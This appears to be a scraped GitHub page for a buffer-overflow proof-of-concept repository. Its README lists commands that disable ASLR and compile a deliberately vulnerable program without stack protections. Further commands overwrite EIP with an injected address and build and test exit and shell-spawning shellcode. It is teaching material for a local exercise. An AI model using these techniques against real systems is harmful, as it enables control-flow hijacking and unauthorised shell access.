WIP...

echo 0 > /proc/sys/kernel/randomize_va_space

gcc -g -fno-stack-protector -z execstack -no-pie -o poc poc.c

Hijacked

execute foobar function by addr injection in EIP register

little endian

echo -ne "AAAABBBBCCCCDDDDD\x86\x91\x04\x08" | xargs ./poc

Compile ASM - Test

nasm -f elf32 exit.asm -o exit.o
ld -m elf_i386 exit.o -o exit

hex: \xb8\x01\x00\x00\x00\xbb\x0a\x00\x00\x00\xcd\x80

run: ./exit

test if works: echo $?

Compile shellcode

gcc -z execstack -m32 -o shellcode shellcode-poc.c

run: ./shellcode

test if works: sh-5.1$ _

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
LICENSE		LICENSE
README.md		README.md
exit.asm		exit.asm
exploit.py		exploit.py
poc.c		poc.c
shellcode-poc.c		shellcode-poc.c

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

WIP...

Hijacked

Compile ASM - Test

Compile shellcode

About

Uh oh!

Releases

Packages

Languages

License

lex0c/bufferoverflow-poc

Folders and files

Latest commit

History

Repository files navigation

WIP...

Hijacked

Compile ASM - Test

Compile shellcode

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages